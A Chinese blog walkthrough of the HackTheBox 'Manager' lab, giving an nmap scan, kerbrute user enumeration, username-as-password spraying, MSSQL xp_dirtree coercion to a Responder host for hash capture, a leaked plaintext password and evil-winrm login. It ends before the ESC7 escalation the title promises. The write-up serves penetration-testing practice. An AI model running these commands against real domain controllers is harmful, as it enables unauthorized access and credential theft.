HTB Manager ESC7 域提权

最新推荐文章于 2024-07-11 21:49:06 发布
最新推荐文章于 2024-07-11 21:49:06 发布
阅读量793 收藏 7
点赞数 6
分类专栏: HTB 文章标签: 网络安全 安全 web安全 系统安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49288916/article/details/135538620
版权

HTB Manager

rustscan -a 10.10.11.236 -- -sV -A -sC  -v -oN manager

# Nmap 7.93 scan initiated Wed Jan 10 14:39:52 2024 as: nmap -vvv -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49674,49675,49673,49733,57721 -sV -A -sC -v -oN manager 10.10.11.236
Nmap scan report for 10.10.11.236
Host is up, received echo-reply ttl 127 (0.66s latency).
Scanned at 2024-01-10 14:39:53 CST for 147s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-01-10 13:39:22Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-30T13:51:28
| Not valid after:  2024-07-29T13:51:28
| MD5:   8f4d67bc2117e4d543e976bd1212b562
| SHA-1: 677995060167b030ce926a31f81c08001c0e29fb
| -----BEGIN CERTIFICATE-----
| MIIGMDCCBRigAwIBAgITXwAAAAnyIQ82Fp4XhwAAAAAACTANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbWFuYWdl
| cjEYMBYGA1UEAxMPbWFuYWdlci1EQzAxLUNBMB4XDTIzMDczMDEzNTEyOFoXDTI0
| MDcyOTEzNTEyOFowGzEZMBcGA1UEAxMQZGMwMS5tYW5hZ2VyLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6FZPVxgTeMZrtGt8BkU233VTv/sRli
| qkDCEGRyikhD6pf0MUk6v9l09Gp6nq93/96cpaRR+/kvtWr/YwjrF33GWwQDzkU+
| VBVaOXkCxS4EfuFSEFSnzfkHXmhNHnKFBqZkIkLAxWGMIsfqNhWhOsEnegm8nwRX
| 34iT2Y+evoi/2n/JvH2j/aBRMrHBXCURX6sL9hbdEbcLgxSddmmau3Tfchl0x64I
| wUlGXx50v/WPIQ3o5knB7aYRL7slrZMy/5+d6Li4q87BE5GFg9f7qWSfusV7bdGD
| B0yLyyZ5sRivyTd6rnSISAxLiSs9b+9b6fLUrtKM4JDyarQ86z2j/VUCAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTwYJKwYBBAGCNxkCBEIw
| QKA+BgorBgEEAYI3GQIBoDAELlMtMS01LTIxLTQwNzgzODIyMzctMTQ5MjE4Mjgx
| Ny0yNTY4MTI3MjA5LTEwMDAwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQOm30
| bCF+E0qwNjyE3ccVpoIQZGMwMS5tYW5hZ2VyLmh0YjAdBgNVHQ4EFgQUt2gOEWz4
| cWjj7uIqK6lyCs6KVp8wHwYDVR0jBBgwFoAUOsv0Ls2JyCQ2Zo85WAYOIr8wDkww
| gcoGA1UdHwSBwjCBvzCBvKCBuaCBtoaBs2xkYXA6Ly8vQ049bWFuYWdlci1EQzAx
| LUNBLENOPWRjMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENO
| PVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWFuYWdlcixEQz1odGI/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFs
| ZGFwOi8vL0NOPW1hbmFnZXItREMwMS1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tYW5h
| Z2VyLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlm
| aWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsFAAOCAQEACQf6JKTDh+L5K/Vz
| jmyEc8OlzzW4CUrAkJx2OJDoxSiELEMcdsswqBgQR5XtJIUa4iiPZjbepPgWzyZN
| qY5LiuuuLJdmF3GVr39Bc9/dn8LXqYX9npL5UkV0pFyiNcK5bgdRLMra3vXtjNsQ
| 9fos0a0dSM0Z+Pc40tJFLjQ1unn5kkU9uYA/np8z0q5V1GCP2Wqm0/6+OEaZHFQw
| 5j26ZQnOvmTaOmy+TI2Be3+PQNqUgnTODMgHr0IYuPWTy1U8nMR9NhWtdywa07A3
| 5U81h/XKD4e21fDdv4wge+LFubtqzOqOKWXlrOXcfdc7dBdRt+tD3bIcTO63AQFC
| A0xH1Q==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-01-10T13:41:31+00:00; +6h59m20s from scanner time.
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-01-10T13:41:30+00:00; +6h59m20s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-30T13:51:28
| Not valid after:  2024-07-29T13:51:28
| MD5:   8f4d67bc2117e4d543e976bd1212b562
| SHA-1: 677995060167b030ce926a31f81c08001c0e29fb
| -----BEGIN CERTIFICATE-----
| MIIGMDCCBRigAwIBAgITXwAAAAnyIQ82Fp4XhwAAAAAACTANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbWFuYWdl
| cjEYMBYGA1UEAxMPbWFuYWdlci1EQzAxLUNBMB4XDTIzMDczMDEzNTEyOFoXDTI0
| MDcyOTEzNTEyOFowGzEZMBcGA1UEAxMQZGMwMS5tYW5hZ2VyLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6FZPVxgTeMZrtGt8BkU233VTv/sRli
| qkDCEGRyikhD6pf0MUk6v9l09Gp6nq93/96cpaRR+/kvtWr/YwjrF33GWwQDzkU+
| VBVaOXkCxS4EfuFSEFSnzfkHXmhNHnKFBqZkIkLAxWGMIsfqNhWhOsEnegm8nwRX
| 34iT2Y+evoi/2n/JvH2j/aBRMrHBXCURX6sL9hbdEbcLgxSddmmau3Tfchl0x64I
| wUlGXx50v/WPIQ3o5knB7aYRL7slrZMy/5+d6Li4q87BE5GFg9f7qWSfusV7bdGD
| B0yLyyZ5sRivyTd6rnSISAxLiSs9b+9b6fLUrtKM4JDyarQ86z2j/VUCAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTwYJKwYBBAGCNxkCBEIw
| QKA+BgorBgEEAYI3GQIBoDAELlMtMS01LTIxLTQwNzgzODIyMzctMTQ5MjE4Mjgx
| Ny0yNTY4MTI3MjA5LTEwMDAwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQOm30
| bCF+E0qwNjyE3ccVpoIQZGMwMS5tYW5hZ2VyLmh0YjAdBgNVHQ4EFgQUt2gOEWz4
| cWjj7uIqK6lyCs6KVp8wHwYDVR0jBBgwFoAUOsv0Ls2JyCQ2Zo85WAYOIr8wDkww
| gcoGA1UdHwSBwjCBvzCBvKCBuaCBtoaBs2xkYXA6Ly8vQ049bWFuYWdlci1EQzAx
| LUNBLENOPWRjMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENO
| PVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWFuYWdlcixEQz1odGI/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFs
| ZGFwOi8vL0NOPW1hbmFnZXItREMwMS1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tYW5h
| Z2VyLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlm
| aWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsFAAOCAQEACQf6JKTDh+L5K/Vz
| jmyEc8OlzzW4CUrAkJx2OJDoxSiELEMcdsswqBgQR5XtJIUa4iiPZjbepPgWzyZN
| qY5LiuuuLJdmF3GVr39Bc9/dn8LXqYX9npL5UkV0pFyiNcK5bgdRLMra3vXtjNsQ
| 9fos0a0dSM0Z+Pc40tJFLjQ1unn5kkU9uYA/np8z0q5V1GCP2Wqm0/6+OEaZHFQw
| 5j26ZQnOvmTaOmy+TI2Be3+PQNqUgnTODMgHr0IYuPWTy1U8nMR9NhWtdywa07A3
| 5U81h/XKD4e21fDdv4wge+LFubtqzOqOKWXlrOXcfdc7dBdRt+tD3bIcTO63AQFC
| A0xH1Q==
|_-----END CERTIFICATE-----
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-01-10T13:41:32+00:00; +6h59m20s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-05T09:54:50
| Not valid after:  2054-01-05T09:54:50
| MD5:   ba08f66f89cc9b7ceda27627f4a05866
| SHA-1: ff3fa587332dad8350581444392e3bb1ec5debea
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQFWjMmWgxqblIbdBNZ95BYzANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjQwMTA1MDk1NDUwWhgPMjA1NDAxMDUwOTU0NTBaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANc3kLMz
| zmSWiflCzRPDE2OUbhiwvVA93WsmGvXWAsuXXFJ6a7mMlHaozhQ3zQIUgogA/WQ1
| YWJnd2nKdeWABKEBt30hA8z+Km6qz9l8BuhPkjwZFJi+awyBetbyEgayTe7P6gzD
| EIMbiCFxw1Zvycmd5PsMPCYfCNIpXjYL8zWQX+f5rHTLwtkJOeBa+AkouLYDeAgl
| rezc1aJtrRt8Jo087SaQH7wahB+ifFQSjYvTIc7kO7XZdNJHE19FdBCWGSs2Bb7C
| ++abGrBLSHrkxHsJWOFvdmO0hxqboUmJmYcHcP7tye+ewBo/6x87pzQtbADyvcEC
| yOcvHtSbnBStAdkCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAM7Aj3YpY1xOsRtwN
| DI9v4yaBA7QQ0kVDcRniIolWJE1QO8mJbXX4+Ev/9VPKHyl+2bO6/vpvL/uO18mH
| zFk1B7iC963EWUqDI/nd1Jy4L0NTg6PLkVW8ojf59l+colS0EsCIREI7YEOKH6oE
| +syTPXZPetgPnX1opLcqHOgVp+UFha4cwZWOD8DNQvAvobmMUJdqpi0t3Pi1xsfq
| Ye8nofpSAm6UEAjktZjMAbev6lNP9QaYxkdlV2IsaIhHpQeGVyj2sooNrt/dximS
| deOBmHZd9v1fJ8GQUMqJwjHxybeOGfp50xxjgbbailk8+CfMRisx8aw83K5wqqOE
| 7pb3Yw==
|_-----END CERTIFICATE-----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-30T13:51:28
| Not valid after:  2024-07-29T13:51:28
| MD5:   8f4d67bc2117e4d543e976bd1212b562
| SHA-1: 677995060167b030ce926a31f81c08001c0e29fb
| -----BEGIN CERTIFICATE-----
| MIIGMDCCBRigAwIBAgITXwAAAAnyIQ82Fp4XhwAAAAAACTANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbWFuYWdl
| cjEYMBYGA1UEAxMPbWFuYWdlci1EQzAxLUNBMB4XDTIzMDczMDEzNTEyOFoXDTI0
| MDcyOTEzNTEyOFowGzEZMBcGA1UEAxMQZGMwMS5tYW5hZ2VyLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6FZPVxgTeMZrtGt8BkU233VTv/sRli
| qkDCEGRyikhD6pf0MUk6v9l09Gp6nq93/96cpaRR+/kvtWr/YwjrF33GWwQDzkU+
| VBVaOXkCxS4EfuFSEFSnzfkHXmhNHnKFBqZkIkLAxWGMIsfqNhWhOsEnegm8nwRX
| 34iT2Y+evoi/2n/JvH2j/aBRMrHBXCURX6sL9hbdEbcLgxSddmmau3Tfchl0x64I
| wUlGXx50v/WPIQ3o5knB7aYRL7slrZMy/5+d6Li4q87BE5GFg9f7qWSfusV7bdGD
| B0yLyyZ5sRivyTd6rnSISAxLiSs9b+9b6fLUrtKM4JDyarQ86z2j/VUCAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTwYJKwYBBAGCNxkCBEIw
| QKA+BgorBgEEAYI3GQIBoDAELlMtMS01LTIxLTQwNzgzODIyMzctMTQ5MjE4Mjgx
| Ny0yNTY4MTI3MjA5LTEwMDAwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQOm30
| bCF+E0qwNjyE3ccVpoIQZGMwMS5tYW5hZ2VyLmh0YjAdBgNVHQ4EFgQUt2gOEWz4
| cWjj7uIqK6lyCs6KVp8wHwYDVR0jBBgwFoAUOsv0Ls2JyCQ2Zo85WAYOIr8wDkww
| gcoGA1UdHwSBwjCBvzCBvKCBuaCBtoaBs2xkYXA6Ly8vQ049bWFuYWdlci1EQzAx
| LUNBLENOPWRjMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENO
| PVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWFuYWdlcixEQz1odGI/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFs
| ZGFwOi8vL0NOPW1hbmFnZXItREMwMS1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tYW5h
| Z2VyLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlm
| aWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsFAAOCAQEACQf6JKTDh+L5K/Vz
| jmyEc8OlzzW4CUrAkJx2OJDoxSiELEMcdsswqBgQR5XtJIUa4iiPZjbepPgWzyZN
| qY5LiuuuLJdmF3GVr39Bc9/dn8LXqYX9npL5UkV0pFyiNcK5bgdRLMra3vXtjNsQ
| 9fos0a0dSM0Z+Pc40tJFLjQ1unn5kkU9uYA/np8z0q5V1GCP2Wqm0/6+OEaZHFQw
| 5j26ZQnOvmTaOmy+TI2Be3+PQNqUgnTODMgHr0IYuPWTy1U8nMR9NhWtdywa07A3
| 5U81h/XKD4e21fDdv4wge+LFubtqzOqOKWXlrOXcfdc7dBdRt+tD3bIcTO63AQFC
| A0xH1Q==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-01-10T13:41:31+00:00; +6h59m20s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA/domainComponent=manager
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-30T13:51:28
| Not valid after:  2024-07-29T13:51:28
| MD5:   8f4d67bc2117e4d543e976bd1212b562
| SHA-1: 677995060167b030ce926a31f81c08001c0e29fb
| -----BEGIN CERTIFICATE-----
| MIIGMDCCBRigAwIBAgITXwAAAAnyIQ82Fp4XhwAAAAAACTANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbWFuYWdl
| cjEYMBYGA1UEAxMPbWFuYWdlci1EQzAxLUNBMB4XDTIzMDczMDEzNTEyOFoXDTI0
| MDcyOTEzNTEyOFowGzEZMBcGA1UEAxMQZGMwMS5tYW5hZ2VyLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6FZPVxgTeMZrtGt8BkU233VTv/sRli
| qkDCEGRyikhD6pf0MUk6v9l09Gp6nq93/96cpaRR+/kvtWr/YwjrF33GWwQDzkU+
| VBVaOXkCxS4EfuFSEFSnzfkHXmhNHnKFBqZkIkLAxWGMIsfqNhWhOsEnegm8nwRX
| 34iT2Y+evoi/2n/JvH2j/aBRMrHBXCURX6sL9hbdEbcLgxSddmmau3Tfchl0x64I
| wUlGXx50v/WPIQ3o5knB7aYRL7slrZMy/5+d6Li4q87BE5GFg9f7qWSfusV7bdGD
| B0yLyyZ5sRivyTd6rnSISAxLiSs9b+9b6fLUrtKM4JDyarQ86z2j/VUCAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwTwYJKwYBBAGCNxkCBEIw
| QKA+BgorBgEEAYI3GQIBoDAELlMtMS01LTIxLTQwNzgzODIyMzctMTQ5MjE4Mjgx
| Ny0yNTY4MTI3MjA5LTEwMDAwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQOm30
| bCF+E0qwNjyE3ccVpoIQZGMwMS5tYW5hZ2VyLmh0YjAdBgNVHQ4EFgQUt2gOEWz4
| cWjj7uIqK6lyCs6KVp8wHwYDVR0jBBgwFoAUOsv0Ls2JyCQ2Zo85WAYOIr8wDkww
| gcoGA1UdHwSBwjCBvzCBvKCBuaCBtoaBs2xkYXA6Ly8vQ049bWFuYWdlci1EQzAx
| LUNBLENOPWRjMDEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENO
| PVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bWFuYWdlcixEQz1odGI/Y2Vy
| dGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3Ry
| aWJ1dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFs
| ZGFwOi8vL0NOPW1hbmFnZXItREMwMS1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5
| JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tYW5h
| Z2VyLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlm
| aWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsFAAOCAQEACQf6JKTDh+L5K/Vz
| jmyEc8OlzzW4CUrAkJx2OJDoxSiELEMcdsswqBgQR5XtJIUa4iiPZjbepPgWzyZN
| qY5LiuuuLJdmF3GVr39Bc9/dn8LXqYX9npL5UkV0pFyiNcK5bgdRLMra3vXtjNsQ
| 9fos0a0dSM0Z+Pc40tJFLjQ1unn5kkU9uYA/np8z0q5V1GCP2Wqm0/6+OEaZHFQw
| 5j26ZQnOvmTaOmy+TI2Be3+PQNqUgnTODMgHr0IYuPWTy1U8nMR9NhWtdywa07A3
| 5U81h/XKD4e21fDdv4wge+LFubtqzOqOKWXlrOXcfdc7dBdRt+tD3bIcTO63AQFC
| A0xH1Q==
|_-----END CERTIFICATE-----
|_ssl-date: 2024-01-10T13:41:30+00:00; +6h59m19s from scanner time.
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49733/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
57721/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/10%OT=53%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=659E3C4C%P=x86_64-pc-linux-gnu)
SEQ(SP=108%GCD=1%ISR=10B%TI=I%II=I%SS=S%TS=U)
OPS(O1=M53ANW8NNS%O2=M53ANW8NNS%O3=M53ANW8%O4=M53ANW8NNS%O5=M53ANW8NNS%O6=M53ANNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M53ANW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 61285/tcp): CLEAN (Timeout)
|   Check 2 (port 4401/tcp): CLEAN (Timeout)
|   Check 3 (port 12164/udp): CLEAN (Timeout)
|   Check 4 (port 63406/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m19s, deviation: 0s, median: 6h59m19s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-10T13:40:52
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   722.92 ms 10.10.16.1
2   722.95 ms 10.10.11.236

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 10 14:42:20 2024 -- 1 IP address (1 host up) scanned in 148.08 seconds

这是一台域控服务器

 DNS:dc01.manager.htb

开启了smb服务(文件共享和网络打印)

445/tcp  open  microsoft-ds?

开启了ms-sql数据库

1433/tcp  open  ms-sql-s

使用kerbrute进行爆破域用户

kerbrute userenum -d manager.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.11.236

在这里插入图片描述

这里爆破的时间很长,下面是爆破出来的用户名

ryan
guest
cheng
raven
administrator
Ryan
Raven
operator
Guest
Administrator
Cheng
jinwoo
RYAN
RAVEN
GUEST
Operator

使用kerbrute爆破administrator用户,未爆破出来,因为administrator用户通常是未设置密码错误阀数,不推荐直接爆破,会有安全日志。

在这里插入图片描述

将用户名放入user.txt,使用crackmapexec进行爆破密码同用户名一样的。

crackmapexec smb manager.htb -u users.txt -p users.txt

在这里插入图片描述

爆破出operator用户名和密码一样

使用mssqlclient连接

impacket-mssqlclient  -windows-aut manager.htb/operator:operator@10.10.11.236

检查是否有权限执行这些代码

Use master;

EXEC sp_helprotect 'xp_dirtree';    \\显示当前目录的子目录

EXEC sp_helprotect 'xp_subdirs';    \\获取指定目录下的目录列表

EXEC sp_helprotect 'xp_fileexist';  \\判断文件是否存在

在这里插入图片描述

使用responder开启伪造服务器,当mssql访问时就会把凭证发过来,再通过破解hash登录mssql获得最高权限。

responder -I tun0 -i 10.10.16.24

在这里插入图片描述

使用xp_dirtreef访问伪造服务器

xp_dirtree "\\10.10.16.24\test"

在这里插入图片描述

得到hash,但是解解密失败,后面步骤就不截屏了

在这里插入图片描述

使用xp_dirtree查询windows默认web目录

xp_dirtree 'C:\inetpub\wwwroot',1 ,1 ;

SQL> xp_dirtree 'C:\inetpub\wwwroot',1 ,1 ;
subdirectory                                                                                                                                                                                                                                                            depth          file   

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   -----------   -----------   

about.html                                                                                                                  1             1   
contact.html                                                                                                                1             1   
css                                                                                                                         1             0   
images                                                                                                                      1             0   
index.html                                                                                                                  1             1   
js                                                                                                                          1             0   
service.html                                                                                                                1             1   
web.config                                                                                                                  1             1   
website-backup-27-07-23-old.zip                                                                                             1             1

将压缩包下载下来解压后找关于有password的字符

grep "password" ./ -r

在这里插入图片描述

cat .old-conf.xml

在这里插入图片描述

raven
R4v3nBe5tD3veloP3r!123

使用evil-winrm登录获取用户flag

evil-winrm -i 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'

cd ../desktop
type user.txt
fa7bf04cf53ecea2a3070f8c1f777ac9

whoami /all

